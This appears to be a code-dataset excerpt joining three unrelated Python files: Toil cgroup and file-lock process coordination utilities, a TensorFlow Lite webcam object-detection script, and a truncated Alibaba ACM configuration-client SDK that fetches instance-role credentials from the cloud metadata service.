super( defaultlocal, self ).__init__( )
self.__dict__.update( kwargs )
def cpu_count():
"""
Get the rounded-up integer number of whole CPUs available.
Counts hyperthreads as CPUs.
Uses the system's actual CPU count, or the current v1 cgroup's quota per
period, if the quota is set.
Ignores the cgroup's cpu shares value, because it's extremely difficult to
interpret. See https://github.com/kubernetes/kubernetes/issues/81021.
Caches result for efficiency.
:return: Integer count of available CPUs, minimum 1.
:rtype: int
"""
cached = getattr(cpu_count, 'result', None)
if cached is not None:
# We already got a CPU count.
return cached
# Get the fallback answer of all the CPUs on the machine
total_machine_size = psutil.cpu_count(logical=True)
log.debug('Total machine size: %d cores', total_machine_size)
try:
with open('/sys/fs/cgroup/cpu/cpu.cfs_quota_us', 'r') as stream:
# Read the quota
quota = int(stream.read())
log.debug('CPU quota: %d', quota)
if quota == -1:
# Assume we can use the whole machine
return total_machine_size
with open('/sys/fs/cgroup/cpu/cpu.cfs_period_us', 'r') as stream:
# Read the period in which we are allowed to burn the quota
period = int(stream.read())
log.debug('CPU quota period: %d', period)
# The thread count is how many multiples of a wall clcok period we can burn in that period.
cgroup_size = int(math.ceil(float(quota)/float(period)))
log.debug('Cgroup size in cores: %d', cgroup_size)
except:
# We can't actually read these cgroup fields. Maybe we are a mac or something.
log.debug('Could not inspect cgroup: %s', traceback.format_exc())
cgroup_size = float('inf')
# Return the smaller of the actual thread count and the cgroup's limit, minimum 1.
result = max(1, min(cgroup_size, total_machine_size))
log.debug('cpu_count: %s', str(result))
# Make sure to remember it for the next call
setattr(cpu_count, 'result', result)
return result
# PIDs are a bad identifier, because they are not shared between containers
# and also may be reused.
# So instead we have another system for file store implementations to
# coordinate among themselves, based on file locks.
# TODO: deduplicate with DeferredFunctionManager?
# TODO: Wrap in a class as static methods?
# Note that we don't offer a way to enumerate these names. You can only get
# your name and poll others' names (or your own). So we don't have
# distinguishing prefixes or WIP suffixes to allow for enumeration.
# We keep one name per unique Toil workDir (i.e. /tmp or whatever existing
# directory Toil tries to put its workflow directory under.)
# We have a global lock to control looking things up
current_process_name_lock = threading.Lock()
# And a global dict from work directory to name in that work directory.
# We also have a file descriptor per work directory but it is just leaked.
current_process_name_for = {}
def collect_process_name_garbage():
"""
Delete all the process names that point to files that don't exist anymore
(because the work directory was temporary and got cleaned up). This is
known to happen during the tests, which get their own temp directories.
Caller must hold current_process_name_lock.
"""
global current_process_name_for
# Collect the workDirs of the missing names to delete them after iterating.
missing = []
for workDir, name in current_process_name_for.items():
if not os.path.exists(os.path.join(workDir, name)):
# The name file is gone, probably because the work dir is gone.
missing.append(workDir)
for workDir in missing:
del current_process_name_for[workDir]
def destroy_all_process_names():
"""
Delete all our process name files because our process is going away.
We let all our FDs get closed by the process death.
We assume there is nobody else using the system during exit to race with.
"""
global current_process_name_for
for workDir, name in current_process_name_for.items():
robust_rmtree(os.path.join(workDir, name))
# Run the cleanup at exit
atexit.register(destroy_all_process_names)
def get_process_name(workDir):
"""
Return the name of the current process. Like a PID but visible between
containers on what to Toil appears to be a node.
:param str workDir: The Toil work directory. Defines the shared namespace.
:return: Process's assigned name
:rtype: str
"""
global current_process_name_lock
global current_process_name_for
with current_process_name_lock:
# Make sure all the names still exist.
# TODO: a bit O(n^2) in the number of workDirs in flight at any one time.
collect_process_name_garbage()
if workDir in current_process_name_for:
# If we already gave ourselves a name, return that.
return current_process_name_for[workDir]
# We need to get a name file.
nameFD, nameFileName = tempfile.mkstemp(dir=workDir)
# Lock the file. The lock will automatically go away if our process does.
try:
fcntl.lockf(nameFD, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError as e:
# Someone else might have locked it even though they should not have.
raise RuntimeError("Could not lock process name file %s: %s" % (nameFileName, str(e)))
# Save the basename
current_process_name_for[workDir] = os.path.basename(nameFileName)
# Return the basename
return current_process_name_for[workDir]
# TODO: we leave the file open forever. We might need that in order for
# it to stay locked while we are alive.
def process_name_exists(workDir, name):
"""
Return true if the process named by the given name (from process_name) exists, and false otherwise.
Can see across container boundaries using the given node workflow directory.
:param str workDir: The Toil work directory. Defines the shared namespace.
:param str name: Process's name to poll
:return: True if the named process is still alive, and False otherwise.
:rtype: bool
"""
global current_process_name_lock
global current_process_name_for
with current_process_name_lock:
if current_process_name_for.get(workDir, None) == name:
# We are asking about ourselves. We are alive.
return True
# Work out what the corresponding file name is
nameFileName = os.path.join(workDir, name)
if not os.path.exists(nameFileName):
# If the file is gone, the process can't exist.
return False
nameFD = None
try:
# Otherwise see if we can lock it shared, for which we need an FD, but
# only for reading.
nameFD = os.open(nameFileName, os.O_RDONLY)
try:
fcntl.lockf(nameFD, fcntl.LOCK_SH | fcntl.LOCK_NB)
except IOError as e:
# Could not lock. Process is alive.
return True
else:
# Could lock. Process is dead.
# Remove the file. We race to be the first to do so.
try:
os.remove(nameFileName)
except:
pass
# Unlock
fcntl.lockf(nameFD, fcntl.LOCK_UN)
# Report process death
return False
finally:
if nameFD is not None:
try:
os.close(nameFD)
except:
pass
# Similar to the process naming system above, we define a global mutex system
# for critical sections, based just around file locks.
@contextmanager
def global_mutex(workDir, mutex):
"""
Context manager that locks a mutex. The mutex is identified by the given
name, and scoped to the given directory. Works across all containers that
have access to the given diectory. Mutexes held by dead processes are
automatically released.
Only works between processes, NOT between threads.
:param str workDir: The Toil work directory. Defines the shared namespace.
:param str mutex: Mutex to lock. Must be a permissible path component.
"""
# Define a filename
lock_filename = os.path.join(workDir, 'toil-mutex-' + mutex)
log.debug('PID %d acquiring mutex %s', os.getpid(), lock_filename)
# We can't just create/open and lock a file, because when we clean up
# there's a race where someone can open the file before we unlink it and
# get a lock on the deleted file.
while True:
# Try to create the file, ignoring if it exists or not.
fd = os.open(lock_filename, os.O_CREAT | os.O_WRONLY)
# Wait until we can exclusively lock it.
fcntl.lockf(fd, fcntl.LOCK_EX)
# Holding the lock, make sure we are looking at the same file on disk still.
fd_stats = os.fstat(fd)
try:
path_stats = os.stat(lock_filename)
except FileNotFoundError:
path_stats = None
if path_stats is None or fd_stats.st_dev != path_stats.st_dev or fd_stats.st_ino != path_stats.st_ino:
# The file we have a lock on is not the file linked to the name (if
# any). This usually happens, because before someone releases a
# lock, they delete the file. Go back and contend again. TODO: This
# allows a lot of queue jumping on our mutex.
fcntl.lockf(fd, fcntl.LOCK_UN)
os.close(fd)
continue
else:
# We have a lock on the file that the name points to. Since we
# hold the lock, nobody will be deleting it or can be in the
# process of deleting it. Stop contending; we have the mutex.
break
try:
# When we have it, do the thing we are protecting.
log.debug('PID %d now holds mutex %s', os.getpid(), lock_filename)
yield
finally:
# Delete it while we still own it, so we can't delete it from out from
# under someone else who thinks they are holding it.
log.debug('PID %d releasing mutex %s', os.getpid(), lock_filename)
os.unlink(lock_filename)
fcntl.lockf(fd, fcntl.LOCK_UN)
# Note that we are unlinking it and then unlocking it; a lot of people
# might have opened it before we unlinked it and will wake up when they
# get the worthless lock on the now-unlinked file. We have to do some
# stat gymnastics above to work around this.
os.close(fd)
class LastProcessStandingArena:
"""
Class that lets a bunch of processes detect and elect a last process
standing.
Process enter and leave (sometimes due to sudden existence failure). We
guarantee that the last process to leave, if it leaves properly, will get a
chance to do some cleanup. If new processes try to enter during the
cleanup, they will be delayed until after the cleanup has happened and the
previous "last" process has finished leaving.
The user is responsible for making sure you always leave if you enter!
Consider using a try/finally; this class is not a context manager.
"""
def __init__(self, workDir, name):
"""
Connect to the arena specified by the given workDir and name.
Any process that can access workDir, in any container, can connect to
the arena. Many arenas can be active with different names.
Doesn't enter or leave the arena.
:param str workDir: The Toil work directory. Defines the shared namespace.
:param str name: Name of the arena. Must be a permissible path component.
"""
# Save the workDir which namespaces everything
self.workDir = workDir
# We need a mutex name to allow only one process to be entering or
# leaving at a time.
self.mutex = name + '-arena-lock'
# We need a way to track who is actually in, and who was in but died.
# So everybody gets a locked file (again).
# TODO: deduplicate with the similar logic for process names, and also
# deferred functions.
self.lockfileDir = os.path.join(workDir, name + '-arena-members')
# When we enter the arena, we fill this in with the FD of the locked
# file that represents our presence.
self.lockfileFD = None
# And we fill this in with the file name
self.lockfileName = None
def enter(self):
"""
This process is entering the arena. If cleanup is in progress, blocks
until it is finished.
You may not enter the arena again before leaving it.
"""
log.debug('Joining arena %s', self.lockfileDir)
# Make sure we're not in it already.
assert self.lockfileName is None
assert self.lockfileFD is None
with global_mutex(self.workDir, self.mutex):
# Now nobody else should also be trying to join or leave.
try:
# Make sure the lockfile directory exists.
os.mkdir(self.lockfileDir)
except FileExistsError:
pass
# Make ourselves a file in it and lock it to prove we are alive.
self.lockfileFD, self.lockfileName = tempfile.mkstemp(dir=self.lockfileDir)
# Nobody can see it yet, so lock it right away
fcntl.lockf(self.lockfileFD, fcntl.LOCK_EX)
# Now we're properly in, so release the global mutex
log.debug('Now in arena %s', self.lockfileDir)
def leave(self):
"""
This process is leaving the arena. If this process happens to be the
last process standing, yields something, with other processes blocked
from joining the arena until the loop body completes and the process
has finished leaving. Otherwise, does not yield anything.
Should be used in a loop:
for _ in arena.leave():
# If we get here, we were the last process. Do the cleanup
pass
"""
# Make sure we're in it to start.
assert self.lockfileName is not None
assert self.lockfileFD is not None
log.debug('Leaving arena %s', self.lockfileDir)
with global_mutex(self.workDir, self.mutex):
# Now nobody else should also be trying to join or leave.
# Take ourselves out.
try:
os.unlink(self.lockfileName)
except:
pass
self.lockfileName = None
fcntl.lockf(self.lockfileFD, fcntl.LOCK_UN)
os.close(self.lockfileFD)
self.lockfileFD = None
for item in os.listdir(self.lockfileDir):
# There is someone claiming to be here. Are they alive?
full_path = os.path.join(self.lockfileDir, item)
fd = os.open(full_path, os.O_RDONLY)
try:
fcntl.lockf(fd, fcntl.LOCK_SH | fcntl.LOCK_NB)
except IOError as e:
# Could not lock. It's alive!
break
else:
# Could lock. Process is dead.
try:
os.remove(full_path)
except:
pass
fcntl.lockf(fd, fcntl.LOCK_UN)
# Continue with the loop normally.
else:
# Nothing alive was found. Nobody will come in while we hold
# the global mutex, so we are the Last Process Standing.
log.debug('We are the Last Process Standing in arena %s', self.lockfileDir)
yield True
try:
# Delete the arena directory so as to leave nothing behind.
os.rmdir(self.lockfileDir)
except:
log.warning('Could not clean up arena %s completely: %s',
self.lockfileDir, traceback.format_exc())
pass
# Now we're done, whether we were the last one or not, and can
# release the mutex.
log.debug('Now out of arena %s', self.lockfileDir)
|
TFLite_detection_webcam.py | ######## Webcam Object Detection Using Tensorflow-trained Classifier #########
#
# Author: Evan Juras
# Date: 10/27/19
# Description:
# This program uses a TensorFlow Lite model to perform object detection on a live webcam
# feed. It draws boxes and scores around the objects of interest in each frame from the
# webcam. To improve FPS, the webcam object runs in a separate thread from the main program.
# This script will work with either a Picamera or regular USB webcam.
#
# This code is based off the TensorFlow Lite image classification example at:
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/examples/python/label_image.py
#
# I added my own method of drawing boxes and labels using OpenCV.
# Import packages
import os
import argparse # Command line interface
import cv2
import numpy as np
import sys
import time
from threading import Thread
import importlib.util # Path access
# Define VideoStream class to handle streaming of video from webcam in separate processing thread
# Source - Adrian Rosebrock, PyImageSearch: https://www.pyimagesearch.com/2015/12/28/increasing-raspberry-pi-fps-with-python-and-opencv/
class VideoStream:
"""Camera object that controls video streaming from the Picamera"""
def __init__(self,resolution=(640,480),framerate=30):
# Initialize the PiCamera and the camera image stream
self.stream = cv2.VideoCapture(1)
ret = self.stream.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG')) #4 byte code to specify the video codec
ret = self.stream.set(3,resolution[0])
ret = self.stream.set(4,resolution[1])
# Read first frame from the stream
(self.grabbed, self.frame) = self.stream.read()
# Variable to control when the camera is stopped
self.stopped = False
def start(self):
# Start the thread that reads frames from the video stream
Thread(target=self.update,args=()).start()
return self
def update(self):
# Keep looping indefinitely until the thread is stopped
while True:
# If the camera is stopped, stop the thread
if self.stopped:
# Close camera resources
self.stream.release()
return
# Otherwise, grab the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# Return the most recent frame
return self.frame
def stop(self):
# Indicate that the camera and thread should be stopped
self.stopped = True
# Define and parse input arguments
parser = argparse.ArgumentParser()
parser.add_argument('--modeldir', help='Folder the .tflite file is located in',
required=True)
parser.add_argument('--graph', help='Name of the .tflite file, if different than detect.tflite',
default='detect.tflite')
parser.add_argument('--labels', help='Name of the labelmap file, if different than labelmap.txt',
default='labelmap.txt')
parser.add_argument('--threshold', help='Minimum confidence threshold for displaying detected objects',
default=0.5)
parser.add_argument('--resolution', help='Desired webcam resolution in WxH. If the webcam does not support the resolution entered, errors may occur.',
default='1280x720')
parser.add_argument('--edgetpu', help='Use Coral Edge TPU Accelerator to speed up detection',
action='store_true')
args = parser.parse_args()
MODEL_NAME = args.modeldir
GRAPH_NAME = args.graph
LABELMAP_NAME = args.labels
min_conf_threshold = float(args.threshold)
resW, resH = args.resolution.split('x')
imW, imH = int(resW), int(resH)
use_TPU = args.edgetpu
# Import TensorFlow libraries
# If tflite_runtime is installed, import interpreter from tflite_runtime, else import from regular tensorflow
# If using Coral Edge TPU, import the load_delegate library
pkg = importlib.util.find_spec('tflite_runtime')
if pkg:
from tflite_runtime.interpreter import Interpreter
if use_TPU:
from tflite_runtime.interpreter import load_delegate
else:
from tensorflow.lite.python.interpreter import Interpreter
if use_TPU:
from tensorflow.lite.python.interpreter import load_delegate
# If using Edge TPU, assign filename for Edge TPU model
if use_TPU:
# If user has specified the name of the .tflite file, use that name, otherwise use default 'edgetpu.tflite'
if (GRAPH_NAME == 'detect.tflite'):
GRAPH_NAME = 'edgetpu.tflite'
# Get path to current working directory
CWD_PATH = os.getcwd()
# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,GRAPH_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,MODEL_NAME,LABELMAP_NAME)
# Load the label map
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
# Have to do a weird fix for label map if using the COCO "starter model" from
# https://www.tensorflow.org/lite/models/object_detection/overview
# First label is '???', which has to be removed.
if labels[0] == '???':
del(labels[0])
# Load the Tensorflow Lite model.
# If using Edge TPU, use special load_delegate argument
if use_TPU:
interpreter = Interpreter(model_path=PATH_TO_CKPT,
experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
print(PATH_TO_CKPT)
else:
interpreter = Interpreter(model_path=PATH_TO_CKPT)
interpreter.allocate_tensors()
# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = 127.5
input_std = 127.5
# Check output layer name to determine if this model was created with TF2 or TF1,
# because outputs are ordered differently for TF2 and TF1 models
outname = output_details[0]['name']
if ('StatefulPartitionedCall' in outname): # This is a TF2 model
boxes_idx, classes_idx, scores_idx = 1, 3, 0
else: # This is a TF1 model
boxes_idx, classes_idx, scores_idx = 0, 1, 2
# Initialize frame rate calculation
frame_rate_calc = 1
freq = cv2.getTickFrequency()
# Initialize video stream
videostream = VideoStream(resolution=(imW,imH),framerate=30).start()
time.sleep(1)
#for frame1 in camera.capture_continuous(rawCapture, format="bgr",use_video_port=True):
while True:
# Start timer (for calculating frame rate)
t1 = cv2.getTickCount()
# Grab frame from video stream
frame1 = videostream.read()
# Acquire frame and resize to expected shape [1xHxWx3]
frame = frame1.copy()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.set_tensor(input_details[0]['index'],input_data)
interpreter.invoke()
# Retrieve detection results
boxes = interpreter.get_tensor(output_details[boxes_idx]['index'])[0] # Bounding box coordinates of detected objects
classes = interpreter.get_tensor(output_details[classes_idx]['index'])[0] # Class index of detected objects
scores = interpreter.get_tensor(output_details[scores_idx]['index'])[0] # Confidence of detected objects
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if ((scores[i] > min_conf_threshold) and (scores[i] <= 1.0)):
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1,(boxes[i][0] * imH)))
xmin = int(max(1,(boxes[i][1] * imW)))
ymax = int(min(imH,(boxes[i][2] * imH)))
xmax = int(min(imW,(boxes[i][3] * imW)))
cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)
# Draw label
object_name = labels[int(classes[i])] # Look up object name from "labels" array using class index
label = '%s: %d%%' % (object_name, int(scores[i]*100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text
# Draw framerate in corner of frame
cv2.putText(frame,'FPS: {0:.2f}'.format(frame_rate_calc),(30,50),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,0),2,cv2.LINE_AA)
# All the results have been drawn on the frame, so it's time to display it.
cv2.imshow('Object detector', frame)
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2-t1)/freq
frame_rate_calc= 1/time1
# Press 'q' to quit
if cv2.waitKey(1) == ord('q'):
break
# Clean up
cv2.destroyAllWindows()
videostream.stop()
|
client.py | import base64
import hashlib
import hmac
import logging
import socket
import sys
import json
try:
import ssl
except ImportError:
ssl = None
from multiprocessing import pool
from queue import Queue
from threading import RLock, Thread
from datetime import datetime
import time
try:
# python3.6
from http import HTTPStatus
from urllib.request import Request, urlopen
from urllib.parse import urlencode, unquote_plus
from urllib.error import HTTPError, URLError
except ImportError:
# python2.7
import httplib as HTTPStatus
from urllib2 import Request, urlopen, HTTPError, URLError
from urllib import urlencode, unquote_plus
base64.encodebytes = base64.encodestring
from .commons import synchronized_with_attr, truncate, python_version_bellow
from .params import group_key, parse_key, is_valid
from .server import get_server_list
from .files import read_file, save_file, delete_file
logging.basicConfig()
logger = logging.getLogger()
DEBUG = False
VERSION = "0.4.10"
DEFAULT_GROUP_NAME = "DEFAULT_GROUP"
DEFAULT_NAMESPACE = ""
WORD_SEPARATOR = u'\x02'
LINE_SEPARATOR = u'\x01'
kms_available = False
def _refresh_session_ak_and_sk_patch(self):
try:
request_url = "http://100.100.100.200/latest/meta-data/ram/security-credentials/" + self._credential.role_name
content = urlopen(request_url).read()
response = json.loads(content.decode('utf8'))
if response.get("Code") != "Success":
logging.error('refresh Ecs sts token err, code is ' + response.get("Code"))
return
session_ak = response.get("AccessKeyId")
session_sk = response.get("AccessKeySecret")
token = response.get("SecurityToken")
self._session_credential = session_ak, session_sk, token
self._expiration = response.get("Expiration")
except IOError as e:
logging.error('refresh Ecs sts token err', e)
def _check_session_credential_patch(self):
if not hasattr(self, '_expiration'):
self._refresh_session_ak_and_sk()
return
expiration = self._expiration if isinstance(self._expiration, (float, int)) \
else time.mktime(datetime.strptime(self._expiration, "%Y-%m-%dT%H:%M:%SZ").timetuple())
now = time.mktime(time.gmtime())
if expiration - now < 3 * 60:
self._refresh_session_ak_and_sk()
try:
from aliyunsdkcore.client import AcsClient
from aliyunsdkkms.request.v20160120.DecryptRequest import DecryptRequest
from aliyunsdkkms.request.v20160120.EncryptRequest import EncryptRequest
from aliyunsdkcore.auth.credentials import EcsRamRoleCredential
from aliyunsdkcore.auth.signers.ecs_ram_role_signer import EcsRamRoleSigner
EcsRamRoleSigner._check_session_credential = _check_session_credential_patch
EcsRamRoleSigner._refresh_session_ak_and_sk = _refresh_session_ak_and_sk_patch
kms_available = True
except ImportError:
logger.info("Aliyun KMS SDK is not installed")
ENCRYPTED_DATA_ID_PREFIX = "cipher-"
DEFAULTS = {
"APP_NAME": "ACM-SDK-Python",
"TIMEOUT": 3, # in seconds
"PULLING_TIMEOUT": 30, # in seconds
"PULLING_CONFIG_SIZE": 3000,
"CALLBACK_THREAD_NUM": 10,
"FAILOVER_BASE": "acm-data/data",
"SNAPSHOT_BASE": "acm-data/snapshot",
"KMS_ENABLED": False,
"REGION_ID": "",
"KEY_ID": "",
}
OPTIONS = set(
["default_timeout", "tls_enabled", "auth_enabled", "cai_enabled", "pulling_timeout", "pulling_config_size",
"callback_thread_num", "failover_base", "snapshot_base", "app_name", "kms_enabled", "region_id",
"kms_ak", "kms_secret", "key_id", "no_snapshot", "ram_role_name"])
class ACMException(Exception):
pass
class ACMRequestException(ACMException):
pass
def process_common_params(data_id, group):
if not group or not group.strip():
group = DEFAULT_GROUP_NAME
else:
group = group.strip()
if not data_id or not is_valid(data_id):
raise ACMException("Invalid dataId.")
if not is_valid(group):
raise ACMException("Invalid group.")
return data_id, group
def parse_pulling_result(result):
if not result:
return list()
ret = list()
for i in unquote_plus(result.decode()).split(LINE_SEPARATOR):
if not i.strip():
continue
sp = i.split(WORD_SEPARATOR)
if len(sp) < 3:
sp.append("")
ret.append(sp)
return ret
def is_encrypted(data_id):
return data_id.startswith(ENCRYPTED_DATA_ID_PREFIX)
class WatcherWrap:
def __init__(self, key, callback):
self.callback = callback
self.last_md5 = None
self.watch_key = key
class CacheData:
def __init__(self, key, client):
self.key = key
local_value = read_file(client.failover_base, key) or read_file(client.snapshot_base, key)
self.content = local_value
src = local_value.decode("utf8") if type(local_value) == bytes else local_value
self.md5 = hashlib.md5(src.encode("GBK")).hexdigest() if src else None
self.is_init = True
if not self.md5:
logger.debug("[init-cache] cache for %s does not have local value" % key)
class ACMClient:
"""Client for ACM
available API:
* get
* add_watcher
* remove_watcher
"""
debug = False
@staticmethod
def set_debugging():
if not ACMClient.debug:
global logger
logger = logging.getLogger("acm")
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(name)s:%(message)s"))
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
ACMClient.debug = True
def __init__(self, endpoint, namespace=None, ak=None, sk=None, ram_role_name=None, unit_name=None):
self.endpoint = endpoint
self.namespace = namespace or DEFAULT_NAMESPACE or ""
self.ak = ak
self.sk = sk
self.ram_role_name = ram_role_name
self.server_list = None
self.server_list_lock = RLock()
self.current_server = None
self.server_offset = 0
self.server_refresh_running = False
self.watcher_mapping = dict()
self.pulling_lock = RLock()
self.puller_mapping = None
self.notify_queue = None
self.callback_tread_pool = None
self.process_mgr = None
self.default_timeout = DEFAULTS["TIMEOUT"]
self.tls_enabled = False
self.auth_enabled = (self.ak and self.sk) or self.ram_role_name
self.cai_enabled = True
self.pulling_timeout = DEFAULTS["PULLING_TIMEOUT"]
self.pulling_config_size = DEFAULTS["PULLING_CONFIG_SIZE"]
self.callback_tread_num = DEFAULTS["CALLBACK_THREAD_NUM"]
self.failover_base = DEFAULTS["FAILOVER_BASE"]
self.snapshot_base = DEFAULTS["SNAPSHOT_BASE"]
self.app_name = DEFAULTS["APP_NAME"]
self.kms_enabled = DEFAULTS["KMS_ENABLED"]
self.region_id = DEFAULTS["REGION_ID"]
self.key_id = DEFAULTS["KEY_ID"]
self.kms_ak = self.ak
self.kms_secret = self.sk
self.kms_client = None
self.no_snapshot = False
self.sts_token = None
self.unit_name = unit_name
logger.info("[client-init] endpoint:%s, tenant:%s" % (endpoint, namespace))
def set_options(self, **kwargs):
for k, v in kwargs.items():
if k not in OPTIONS:
logger.warning("[set_options] unknown option:%s, ignored" % k)
continue
if k == "kms_enabled" and v and not kms_available:
logger.warning("[set_options] kms can not be turned on with no KMS SDK installed")
continue
logger.debug("[set_options] key:%s, value:%s" % (k, v))
setattr(self, k, v)
def _refresh_server_list(self):
with self.server_list_lock:
if self.server_refresh_running:
logger.warning("[refresh-server] task is running, aborting")
return
self.server_refresh_running = True
while True:
try:
time.sleep(30)
logger.debug("[refresh-server] try to refresh server list")
server_list = get_server_list(self.endpoint, 443 if self.tls_enabled else 8080, self.cai_enabled,
self.unit_name)
logger.debug(
"[refresh-server] server_num:%s server_list:%s" % (len(server_list), server_list))
if not server_list:
logger.error("[refresh-server] empty server_list get from %s, do not refresh" % self.endpoint)
continue
with self.server_list_lock:
self.server_list = server_list
self.server_offset = 0
if self.current_server not in server_list:
logger.warning("[refresh-server] %s is not effective, change one" % str(self.current_server))
self.current_server = server_list[self.server_offset]
except Exception as e:
logger.exception("[refresh-server] exception %s occur" % str(e))
def change_server(self):
with self.server_list_lock:
self.server_offset = (self.server_offset + 1) % len(self.server_list)
self.current_server = self.server_list[self.server_offset]
def get_server(self):
if self.server_list is None:
with self.server_list_lock:
logger.info("[get-server] server list is null, try to initialize")
server_list = get_server_list(self.endpoint, 443 if self.tls_enabled else 8080, self.cai_enabled,
self.unit_name)
if not server_list:
logger.error("[get-server] empty server_list get from %s" % self.endpoint)
return None
self.server_list = server_list
self.current_server = self.server_list[self.server_offset]
logger.info("[get-server] server_num:%s server_list:%s" % (len(self.server_list), self.server_list))
if self.cai_enabled:
t = Thread(target=self._refresh_server_list)
t.setDaemon(True)
t.start()
logger.info("[get-server] use server:%s" % str(self.current_server))
return self.current_server
def remove(self, data_id, group, timeout=None):
""" Remove one data item from ACM.
:param data_id: dataId.
:param group: group, use "DEFAULT_GROUP" if no group specified.
:param timeout: timeout for requesting server in seconds.
:return: True if success or an exception will be raised.
"""
data_id, group = process_common_params(data_id, group)
logger.info(
"[remove] data_id:%s, group:%s, namespace:%s, timeout:%s" % (data_id, group, self.namespace, timeout))
params = {
"dataId": data_id,
"group": group,
}
if self.namespace:
params["tenant"] = self.namespace
try:
resp = self._do_sync_req("/diamond-server/datum.do?method=deleteAllDatums", None, None, params,
timeout or self.default_timeout)
logger.info("[remove] success to remove group:%s, data_id:%s, server response:%s" % (
group, data_id, resp.read()))
return True
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
logger.error(
"[remove] no right for namespace:%s, group:%s, data_id:%s" % (self.namespace, group, data_id))
raise ACMException("Insufficient privilege.")
else:
logger.error("[remove] error code [:%s] for namespace:%s, group:%s, data_id:%s" % (
e.code, self.namespace, group, data_id))
raise ACMException("Request Error, code is %s" % e.code)
except Exception as e:
logger.exception("[remove] exception %s occur" % str(e))
raise
def publish(self, data_id, group, content, timeout=None, app_name=None):
""" Publish one data item to ACM.
If the data key is not exist, create one first.
If the data key is exist, update to the content specified.
Content can not be set to None, if there is need to delete config item, use function **remove** instead.
:param data_id: dataId.
:param group: group, use "DEFAULT_GROUP" if no group specified.
:param content: content of the data item.
:param timeout: timeout for requesting server in seconds.
:param app_name: specify the name of the application to which this configuration belongs
:return: True if success or an exception will be raised.
"""
if content is None:
raise ACMException("Can not publish none content, use remove instead.")
data_id, group = process_common_params(data_id, group)
if type(content) == bytes:
content = content.decode("utf8")
if is_encrypted(data_id) and self.kms_enabled:
content = self.encrypt(content)
logger.info("[publish] data_id:%s, group:%s, namespace:%s, content:%s, timeout:%s" % (
data_id, group, self.namespace, truncate(content), timeout))
params = {
"dataId": data_id,
"group": group,
"content": content.encode("GBK"),
}
if self.namespace:
params["tenant"] = self.namespace
if app_name:
params["appName"] = app_name
try:
resp = self._do_sync_req("/diamond-server/basestone.do?method=syncUpdateAll", None, None, params,
timeout or self.default_timeout)
logger.info("[publish] success to publish content, group:%s, data_id:%s, server response:%s" % (
group, data_id, resp.read()))
return True
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
logger.error(
"[publish] no right for namespace:%s, group:%s, data_id:%s" % (self.namespace, group, data_id))
raise ACMException("Insufficient privilege.")
else:
logger.error("[publish] error code [:%s] for namespace:%s, group:%s, data_id:%s" % (
e.code, self.namespace, group, data_id))
raise ACMException("Request Error, code is %s" % e.code)
except Exception as e:
logger.exception("[publish] exception %s occur" % str(e))
raise
def get(self, data_id, group, timeout=None, no_snapshot=None):
content = self.get_raw(data_id, group, timeout, no_snapshot)
if content and is_encrypted(data_id) and self.kms_enabled:
return self.decrypt(content)
return content
def get_raw(self, data_id, group, timeout=None, no_snapshot=None):
"""Get value of one config item.
Query priority:
1. Get from local failover dir(default: "{cwd}/acm/data").
Failover dir can be manually copied from snapshot dir(default: "{cwd}/acm/snapshot") in advance.
This helps to suppress the effect of known server failure.
2. Get from one server until value is got or all servers tried.
Content will be save to snapshot dir.
3. Get from snapshot dir.
:param data_id: dataId.
:param group: group, use "DEFAULT_GROUP" if no group specified.
:param timeout: timeout for requesting server in seconds.
:param no_snapshot: do not save snapshot.
:return: value.
"""
no_snapshot = self.no_snapshot if no_snapshot is None else no_snapshot
data_id, group = process_common_params(data_id, group)
logger.info("[get-config] data_id:%s, group:%s, namespace:%s, timeout:%s" % (
data_id, group, self.namespace, timeout))
params = {
"dataId": data_id,
"group": group,
}
if self.namespace:
params["tenant"] = self.namespace
cache_key = group_key(data_id, group, self.namespace)
# get from failover
content = read_file(self.failover_base, cache_key)
if content is None:
logger.debug("[get-config] failover config is not exist for %s, try to get from server" % cache_key)
else:
logger.debug("[get-config] get %s from failover directory, content is %s" % (cache_key, truncate(content)))
return content
# get from server
try:
resp = self._do_sync_req("/diamond-server/config.co", None, params, None, timeout or self.default_timeout)
content = resp.read().decode("GBK")
except HTTPError as e:
if e.code == HTTPStatus.NOT_FOUND:
logger.warning(
"[get-config] config not found for data_id:%s, group:%s, namespace:%s, try to delete snapshot" % (
